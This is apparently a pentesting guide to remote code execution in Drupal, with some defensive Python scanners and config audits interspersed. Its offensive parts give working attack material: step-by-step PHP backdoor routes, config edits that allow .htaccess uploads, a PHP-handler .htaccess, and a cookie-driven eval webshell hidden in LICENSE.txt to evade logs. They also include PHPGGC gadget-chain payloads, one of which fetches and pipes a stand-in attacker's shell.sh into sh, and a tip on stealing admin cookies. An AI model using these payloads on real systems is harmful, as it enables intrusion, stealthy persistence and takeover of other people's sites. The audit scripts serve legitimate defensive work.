Drupal RCE


With PHP Filter Module

Warning

In older versions of Drupal (before version 8), it was possible to log in as admin and enable the PHP filter module, which "Allows embedded PHP code/snippets to be evaluated." Since version 8, however, this module is no longer installed by default.

  1. Go to /modules/php and if a 403 error is returned then the PHP filter plugin is installed and you can continue
  2. If not, go to Modules and check on the box of PHP Filter and then on Save configuration
  3. Then, to exploit it, click on Add content , then Select Basic Page or Article and write the PHP backdoor, then select PHP code in Text format and finally select Preview
  4. To trigger it, just access the newly created node:
curl http://drupal.local/node/3

Install the PHP Filter module

Warning

In current versions it is no longer possible to install plugins with web access alone after a default installation.

From version 8 onwards, the PHP Filter module is not installed by default. To use this capability we have to install the module ourselves.

  1. Download the most recent version of the module from the Drupal website.
  2. wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz
  3. Once downloaded, go to Administration > Reports > Available updates.
  4. Click Browse, select the file from the directory we downloaded it to, and then click Install.
  5. Once the module is installed, we can click on Content and create a new basic page, similar to how we did in the Drupal 7 example. Again, be sure to select PHP code from the Text format drop-down.

Backdoored Module

Warning

In current versions it is no longer possible to install plugins with web access alone after a default installation.

It used to be possible to download a module, add a backdoor to it and install it. For example, download the Turnstile module in compressed form, create a new PHP backdoor file inside it, and allow access to that PHP file with an .htaccess file:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
</IfModule>

Then go to http://drupal.local/admin/modules/install to install the backdoored module, and access /modules/turnstile/back.php to execute it.

Backdooring Drupal with Configuration synchronization

Post shared by Coiffeur0x90

Part 1 (enable Media and Media Library)

In the Extend menu (/admin/modules), you can activate what appear to be plugins that are already installed. By default, the Media and Media Library plugins do not appear to be activated, so let's activate them.

Before activation:

After activation:

Part 2 (using the Configuration synchronization feature)

We will use the Configuration synchronization feature to export and import Drupal configuration entries:

  • /admin/config/development/configuration/single/export
  • /admin/config/development/configuration/single/import

Patch system.file.yml

Let's start by patching the first entry, allow_insecure_uploads, from:

File: system.file.yml

...
allow_insecure_uploads: false
...

To:

File: system.file.yml

...
allow_insecure_uploads: true
...

Patch field.field.media.document.field_media_document.yml

Then, patch the second entry, file_extensions, from:

File: field.field.media.document.field_media_document.yml

...
file_directory: '[date:custom:Y]-[date:custom:m]'
file_extensions: 'txt rtf doc docx ppt pptx xls xlsx pdf odf odg odp ods odt fodt fods fodp fodg key numbers pages'
...

To:

File: field.field.media.document.field_media_document.yml

...
file_directory: '[date:custom:Y]-[date:custom:m]'
file_extensions: 'htaccess txt rtf doc docx ppt pptx xls xlsx pdf odf odg odp ods odt fodt fods fodp fodg key numbers pages'
...

I will not use this in this blog post, but it is mentioned that it is possible to define the file_directory entry arbitrarily and that it is vulnerable to a path traversal attack (so we could go back up inside the Drupal filesystem tree).
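A defender reviewing config exports (or a `config:export` dump) can spot the two edits from Part 2 mechanically. The following is an added example, not code from the original post: it parses the flat `key: value` lines of the two files with a small line-based parser (a real config tree would be loaded with PyYAML) and flags `allow_insecure_uploads: true`, executable or override extensions in `file_extensions`, and traversal in `file_directory`; the sample contents are constructed.

```python
import re

# Extensions that let an upload run as code or override Apache behaviour.
DANGEROUS_EXTENSIONS = {"htaccess", "php", "phtml", "phar", "phps", "pht",
                        "php3", "php5", "php7", "inc"}

# Matches "key: value" and "key: 'value'" lines; indentation is ignored, so a
# nested key such as settings.file_extensions is flattened to its leaf name.
KV_RE = re.compile(r"^\s*([A-Za-z0-9_.]+):\s*'?([^']*?)'?\s*$")

def parse_flat_yaml(text):
    """Return {leaf_key: value} for every scalar line in a config export."""
    entries = {}
    for line in text.splitlines():
        m = KV_RE.match(line)
        if m:
            entries[m.group(1)] = m.group(2)
    return entries

def audit_system_file(text):
    """Flag allow_insecure_uploads: true (Drupal then stops appending .txt to
    uploads whose extension it considers insecure)."""
    cfg = parse_flat_yaml(text)
    if cfg.get("allow_insecure_uploads", "false").strip().lower() == "true":
        return ["system.file: allow_insecure_uploads is true"]
    return []

def audit_media_document_field(text):
    """Flag risky extensions and traversal in the media document field config."""
    cfg = parse_flat_yaml(text)
    findings = []
    bad = sorted(set(cfg.get("file_extensions", "").split()) & DANGEROUS_EXTENSIONS)
    if bad:
        findings.append("field_media_document: risky file_extensions " + " ".join(bad))
    if ".." in cfg.get("file_directory", ""):
        findings.append("field_media_document: file_directory allows traversal")
    return findings

# Constructed samples: stock values beside the patched values shown above.
SYSTEM_FILE_OK = "allow_insecure_uploads: false\n"
SYSTEM_FILE_WEAK = "allow_insecure_uploads: true\n"
FIELD_OK = "file_directory: '[date:custom:Y]-[date:custom:m]'\nfile_extensions: 'txt rtf doc pdf'\n"
FIELD_WEAK = "file_directory: '../../'\nfile_extensions: 'htaccess txt rtf doc pdf'\n"

if __name__ == "__main__":
    for name, sysf, field in [("stock", SYSTEM_FILE_OK, FIELD_OK), ("patched", SYSTEM_FILE_WEAK, FIELD_WEAK)]:
        print(name, audit_system_file(sysf) + audit_media_document_field(field) or "no findings")
```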

Part 3 (using the Add Document feature)

The last part is the easiest, and is divided into two sub-steps. The first is to upload a file in .htaccess format to leverage Apache directives and allow .txt files to be interpreted by the PHP engine. The second is to upload a .txt file containing our payload.

File: .htaccess

<Files *>
SetHandler application/x-httpd-php
</Files>

# Vroum! Vroum!
# We reactivate PHP engines for all versions in order to be targetless.
<IfModule mod_php.c>
php_flag engine on
</IfModule>
<IfModule mod_php7.c>
php_flag engine on
</IfModule>
<IfModule mod_php5.c>
php_flag engine on
</IfModule>

Why is this trick cool?

Because once the Webshell (which we will call LICENSE.txt) is dropped on the Web server, we can send our commands via $_COOKIE, and in the Web server logs this will look like a legitimate GET request for a text file.

Why name our Webshell LICENSE.txt?

Simply because, if we take the following file, for example core/LICENSE.txt (which already exists in Drupal core), we have a 339-line file of 17.6 KB, which is perfect for adding a small piece of PHP in the middle (because the file is large enough).

File: Patched LICENSE.txt
...

this License, you may choose any version ever published by the Free Software
Foundation.

<?php

# We inject our payload into the cookies so that in the logs of the compromised
# server it shows up as having been requested via the GET method, in order to
# avoid raising suspicions.
if (isset($_COOKIE["89e127753a890d9c4099c872704a0711bbafbce9"])) {
if (!empty($_COOKIE["89e127753a890d9c4099c872704a0711bbafbce9"])) {
eval($_COOKIE["89e127753a890d9c4099c872704a0711bbafbce9"]);
} else {
phpinfo();
}
}

?>

10. If you wish to incorporate parts of the Program into other free
programs whose distribution conditions are different, write to the author

...

Part 3.1 (upload the .htaccess file)

First, we leverage the Add Document (/media/add/document) feature to upload our file containing the Apache directives (.htaccess).

Part 3.2 (upload the LICENSE.txt file)

Then, we leverage the Add Document (/media/add/document) feature again to upload a Webshell hidden within a license file.

Part 4 (interacting with the Webshell)

The last part consists of interacting with the Webshell.

As shown in the following screenshot, if the cookie expected by our Webshell is not defined, we get the subsequent result when consulting the file via a Web browser.

When the attacker sets the cookie, he can interact with the Webshell and execute any commands he wants.

And as you can see in the logs, it looks like only a txt file has been requested.

Thank you for taking the time to read this article, I hope it will help you get some shells.
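The two artefacts this technique leaves in the public files directory (an uploaded .htaccess that re-enables PHP, and a "text" file carrying PHP tags or an eval fed from a request superglobal) are easy to sweep for. This is an added example, not code from the post above; the sample tree it builds is constructed, and it compares against Drupal's stock files/.htaccess, which turns the PHP engine off.

```python
import pathlib
import re
import tempfile

# Directives that make uploads executable or re-enable PHP in a directory
# where Drupal's own files/.htaccess turns it off.
HANDLER_RE = re.compile(
    r"(SetHandler|AddHandler|AddType)\s+\S*php|php_(admin_)?flag\s+engine\s+on", re.I)
# PHP open tags, or eval() fed straight from a request superglobal, inside a
# file that should be plain text.
PHP_TAG_RE = re.compile(r"<\?(php\b|=)|\beval\s*\(\s*\$_(COOKIE|GET|POST|REQUEST)\b", re.I)
TEXT_LIKE = {".txt", ".md", ".rtf", ".csv", ".log"}

def scan_files_dir(root):
    """Return sorted (finding, relative_path) pairs for everything under root."""
    root = pathlib.Path(root)
    findings = []
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        try:
            data = path.read_text(errors="replace")
        except OSError:
            continue
        rel = path.relative_to(root).as_posix()
        if path.name == ".htaccess" and HANDLER_RE.search(data):
            findings.append(("htaccess-php-handler", rel))
        elif path.suffix.lower() in TEXT_LIKE and PHP_TAG_RE.search(data):
            findings.append(("php-in-text-file", rel))
    return sorted(findings)

def build_sample_tree():
    """Constructed files tree: stock root .htaccess plus the two planted files."""
    root = pathlib.Path(tempfile.mkdtemp(prefix="drupal-files-"))
    (root / ".htaccess").write_text("Options -Indexes\nphp_flag engine off\n")
    month = root / "2024-05"
    month.mkdir()
    (month / ".htaccess").write_text("<Files *>\nSetHandler application/x-httpd-php\n</Files>\n")
    (month / "LICENSE.txt").write_text(
        "GNU GENERAL PUBLIC LICENSE\n<?php\neval($_COOKIE['c']);\n?>\nmore license text\n")
    (month / "report.txt").write_text("quarterly figures\n")
    return str(root)

if __name__ == "__main__":
    for finding, rel in scan_files_dir(build_sample_tree()):
        print(finding, rel)
```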

Drupal core gadget chain (SA-CORE-2024-007 / SA-CORE-2024-008)

Two advisories published 20 Nov 2024 (CVE-2024-55637 & CVE-2024-55638) describe new PHP object gadget chains in Drupal core (7.0–7.101, 8.x, 10.2.0–10.2.10, 10.3.0–10.3.8, early 11.x). They are not directly exploitable but give attackers a ready-made chain once any contrib/module performs unserialize() on user input.

Practical exploitation workflow:

  1. Locate an unserialize sink (contrib module or custom code). Grep the codebase for unserialize( or Drupal\Component\Serialization\PhpSerialize::decode. Target endpoints that accept POST/JSON or configuration imports.
  2. Generate a payload using the vulnerable class path that matches the gadget chain. After SA-CORE-2024-008, the public chain was added to common payload generators. Example with PHPGGC (commit ≥ Dec 2024):
./phpggc drupal/rce2 system 'id' > payload.ser
  3. Deliver the serialized blob to the sink (for example, a parameter that gets deserialized). For a form-encoded body:
curl -X POST https://target/admin/config/some/module \
-d "serialized_setting=$(cat payload.ser)"
  4. Trigger the destructor (usually runs automatically at the end of the request) and the command executes.

Testing notes:

  • The gadget only works on versions before 10.2.11 / 10.3.9 / 7.102 (those releases carry the security fix). Confirm the target version via /core/lib/Drupal.php or CHANGELOG.txt.
  • Third-party DB drivers may need additional hardening; look at deployments that skipped the security update window.

Recent contrib-module unsafe deserialization → RCE

Several contrib modules fixed unsafe unserialize() paths at the end of 2024. If a site has not received these updates, they provide the exploitable sink needed by the core gadget chain:

  • Mailjet (<4.0.1, CVE-2024-13296): admin-controlled data is passed to unserialize(), allowing PHP Object Injection → RCE when combined with the core gadgets.
  • Eloqua (7.x-1.x < 1.15, CVE-2024-13297): similar unsafe use of unserialize() reachable by users with access administration pages.

Test idea (confirmed):

phpggc drupal/rce2 system 'bash -c "curl http://attacker/shell.sh|sh"' > p.ser
curl -b session=ADMINCOOKIE \
-F "import=@p.ser" https://target/admin/config/eloqua/import

If the module deserializes the uploaded data, the gadget chain yields RCE. Combine with XSS/CSRF to steal admin cookies for a full attack chain.
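Both the core gadget-chain workflow (step 1, finding a sink) and the contrib-module list above come down to the same audit question for a site owner: which deserialization calls in the deployed code are reachable from a request and still allow object instantiation? The following is an added example, not code from this page or from any of the modules named: a static triage pass that lists every unserialize()/PhpSerialize::decode call, marks inline request sources as tainted, and treats only `allowed_classes => false` as a guard. It does not follow assignments, so a variable filled from a request on an earlier line is not caught; the PHP fragment it runs on is constructed.

```python
import re

# Calls that turn a byte string into PHP objects and can therefore fire a gadget chain.
CALL_RE = re.compile(r"\b(unserialize|PhpSerialize::decode)\s*\(", re.I)
# Inline request sources only; earlier assignments are not followed (no data-flow).
TAINT_RE = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b|\$request->|getContent\(\)", re.I)
# unserialize() refuses to instantiate objects when allowed_classes is false.
SAFE_RE = re.compile(r"allowed_classes\W*=>\s*false", re.I)

def call_arguments(src, open_paren):
    """Return the text between the '(' at open_paren and its matching ')'."""
    depth = 0
    for i in range(open_paren, len(src)):
        if src[i] == "(":
            depth += 1
        elif src[i] == ")":
            depth -= 1
            if depth == 0:
                return src[open_paren + 1:i]
    return src[open_paren + 1:]

def find_unserialize_sinks(src):
    """List every deserialization call with its line number, taint and guard flags."""
    sinks = []
    for m in CALL_RE.finditer(src):
        args = call_arguments(src, m.end() - 1)
        sinks.append({
            "line": src.count("\n", 0, m.start()) + 1,
            "func": m.group(1),
            "tainted": bool(TAINT_RE.search(args)),
            "guarded": bool(SAFE_RE.search(args)),
        })
    return sinks

def risky(sinks):
    """Request-reachable calls that still allow object instantiation."""
    return [s for s in sinks if s["tainted"] and not s["guarded"]]

# Constructed PHP fragment (not real module code) covering the cases that matter.
SAMPLE_PHP = r"""<?php
$settings = unserialize($this->config->get('module_settings'));
$import = unserialize($request->request->get('import'));
$safe = unserialize($_POST['blob'], ['allowed_classes' => false]);
$data = \Drupal\Component\Serialization\PhpSerialize::decode($_COOKIE['s']);
"""

if __name__ == "__main__":
    for s in risky(find_unserialize_sinks(SAMPLE_PHP)):
        print("line", s["line"], s["func"], "is request-reachable and unguarded")
```

Line 2 is listed but not flagged because the source is configuration, which is exactly the admin-controlled path the Mailjet advisory describes; review those by hand rather than trusting the taint flag.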
